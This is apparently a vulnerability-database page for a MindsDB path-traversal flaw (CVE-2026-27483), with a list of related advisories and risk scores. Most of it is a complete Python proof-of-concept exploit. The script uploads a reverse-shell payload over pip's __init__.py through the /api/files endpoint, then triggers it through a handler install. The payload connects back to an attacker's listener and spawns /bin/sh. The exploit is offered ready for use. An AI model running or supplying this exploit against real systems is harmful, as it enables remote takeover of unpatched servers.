MindsDB 25.9.1.1 - Path Traversal

🗓️ 04 May 2026 00:00:00Reported by thewhiteh4tType

MindsDB path traversal allows remote code execution (CVE-2026-27483) in versions before 25.9.1.1.

Reporter	Title	Published	Views	Family All 16
GithubExploit	Exploit for Path Traversal in Mindsdb	6 Mar 202607:52	–	githubexploit
Circl	CVE-2026-27483	22 Feb 202619:31	–	circl
CNNVD	MindsDB 路径遍历漏洞	24 Feb 202600:00	–	cnnvd
CVE	CVE-2026-27483	24 Feb 202614:00	–	cve
Cvelist	CVE-2026-27483 MindsDB has Path Traversal in /api/files Leading to Remote Code Execution	24 Feb 202614:00	–	cvelist
EUVD	EUVD-2026-8466	24 Feb 202614:00	–	euvd
Github Security Blog	MindsDB: Path Traversal in /api/files Leading to Remote Code Execution	24 Feb 202620:07	–	github
Nuclei	MindsDB - Remote Code Execution	7 Jun 202603:02	–	nuclei
NVD	CVE-2026-27483	24 Feb 202615:21	–	nvd
OSV	CVE-2026-27483 MindsDB has Path Traversal in /api/files Leading to Remote Code Execution	24 Feb 202614:00	–	osv

# Exploit Title: MindsDB  25.9.1.1 - Path Traversal 
# Date: 06-03-2026
# Exploit Author: Lohitya Pushkar (thewhiteh4t)
# Vendor Homepage: https://mindsdb.com/
# Software Link: https://github.com/mindsdb/mindsdb
# Version: < 25.9.1.1
# Tested on: Arch Linux
# CVE : CVE-2026-27483
# Original Advisory: https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
# Vulnerability Discovery: XlabAITeam

import argparse
import random
import re
import string
import sys

import requests
from packaging.version import Version

PIP_PATH = "../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
HANDLER = "anomaly_detection"  # query /api/handlers/ -> not installed handlers

BANNER = """
-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)
"""

try:
    parser = argparse.ArgumentParser()
    parser.add_argument("-rh", default="127.0.0.1", help="Target host")
    parser.add_argument("-rp", default="47334", help="Target port")
    parser.add_argument("-lh", help="Listener host")
    parser.add_argument("-lp", default="4444", help="Listener port")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()

    rhost = args.rh
    rport = args.rp
    lhost = args.lh
    lport = args.lp
    user = args.u
    pswd = args.p

    base_url = f"http://{rhost}:{rport}"

    print(BANNER)
    print(f"[>] Target   : {base_url}")
    print(f"[>] LHOST    : {lhost}")
    print(f"[>] LPORT    : {lport}\n")

    def login(username, password):
        r = requests.post(
            f"{base_url}/api/login", json={"username": username, "password": password}
        )
        if r.status_code == 200 and "token" in r.text:
            token = r.json().get("token")
            print("[+] Login successful!")
            return token
        print("[!] Login failed : ", r.status_code)
        print(f"---\n{r.text}\n---")
        return None

    print("[*] Checking status...\n")
    r = requests.get(f"{base_url}/api/status")

    if r.status_code != 200:
        print("[-] Status code :", r.status_code)
        print(f"---\n{r.text}\n---")
        sys.exit()

    status_json = r.json()
    ver = status_json["mindsdb_version"]
    auth = status_json["auth"]["http_auth_enabled"]

    print(f"[*] MindsDB Version : {ver}")
    auth_headers = {}

    ver_clean = Version(re.sub(r"[a-zA-Z].*$", "", ver))
    if ver_clean < Version("25.4.1.0"):
        print(
            f"[!] Version {ver} < 25.4.1.0 — may use Python 3.8/3.9, PoC targets 3.10, manually edit PIP_PATH and try again."
        )
        sys.exit(0)
    if ver_clean >= Version("25.9.1.1"):
        print(f"[!] Version {ver} is patched (>= 25.9.1.1). Aborting.")
        sys.exit(0)

    if auth:
        if not user or not pswd:
            print("[!] Auth is enabled. Provide --username and --password.")
            sys.exit()
        token = login(user, pswd)
        if not token:
            sys.exit()
        auth_headers = {"Authorization": f"Bearer {token}"}
    else:
        print("[*] Auth disabled — proceeding unauthenticated")

    shell_pl = f'''#!/usr/bin/env python3

import os,pty,socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{lhost.strip()}",{lport.strip()}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
'''.replace("\n", "\r\n")

    fname = "".join(random.choices(string.ascii_lowercase, k=8))

    payload = {"name": fname, "source": fname, "source_type": "file"}

    infile = {"file": (PIP_PATH, shell_pl, "text/plain")}

    print("[*] Uploading payload :", fname)
    pr = requests.put(
        f"{base_url}/api/files/{fname}",
        data=payload,
        files=infile,
        headers=auth_headers,
    )

    if pr.status_code == 400:
        print("[+] Payload uploaded!")
    else:
        print("[-] Payload upload request :", pr.status_code)
        print(f"---\n{pr.text}\n---")
        sys.exit()

    print("[*] Triggering payload...")
    r = requests.post(
        f"{base_url}/api/handlers/{HANDLER}/install", json={}, headers=auth_headers
    )

except Exception as exc:
    print("[-] Exception :", exc)
except KeyboardInterrupt:
    sys.exit()

04 May 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.18.8

EPSS0.23286

SSVC